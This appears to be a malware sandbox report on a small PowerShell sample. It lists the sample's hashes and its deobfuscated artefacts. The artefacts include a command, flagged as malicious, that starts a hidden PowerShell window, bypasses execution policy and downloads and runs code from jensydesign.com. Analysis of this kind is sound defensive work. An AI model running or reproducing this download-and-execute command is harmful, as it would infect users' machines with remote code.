General
Structural Analysis
Config.0
Yara Rules12
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 1ecc3702b16bcc926be3c8d95dc06fd1
|
| Sha1 | 9238d234eb837112a8811f351deb68ccc68aa402
|
| Sha256 | 27984f24969cdafc6c2eadce6668bc0dba993b090d9b008ae1c92bc7ba952069
|
| Sha384 | c5cd0402afcbbecd37ad4063730a35abcce4a56dc0a0aa48b3d0a5048f9b67a94f53f3eec913b2a0ca192d6231cd0bae
|
| Sha512 | 3afb8b3750db1301a1cc6e1fd2d74505957e2d6aa24c6aa68af8d11b4d2403e6aec585868d98e720302e7b827b1f876459e9ca41c7cfb543d2c241f86875784e
|
| SSDeep | 3:VSJJFIGFGMFI1oM3KAJJFId1sqPJH0cVERvBuIFqKcun:s8GFGMFI1R3Ks8zsO0cKgKcun
|
File Structure
Artefacts
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | Start-Process -WindowStyle "Hidden" "powershell" -Args "-ExecutionPolicy Bypass -c iex(irm jensydesign.com)" |
| Deobfuscated PowerShell | -args "-ExecutionPolicy Bypass -c iex(irm jensydesign.com)" |
1ecc3702b16bcc926be3c8d95dc06fd1 (120 B)
File Structure
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | Start-Process -WindowStyle "Hidden" "powershell" -Args "-ExecutionPolicy Bypass -c iex(irm jensydesign.com)" Malicious |
1ecc3702b16bcc926be3c8d95dc06fd1 > [PowerShell Command] |
| Deobfuscated PowerShell | -args "-ExecutionPolicy Bypass -c iex(irm jensydesign.com)" Malicious |
1ecc3702b16bcc926be3c8d95dc06fd1 > [PowerShell Command] > [PowerShell Command] |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.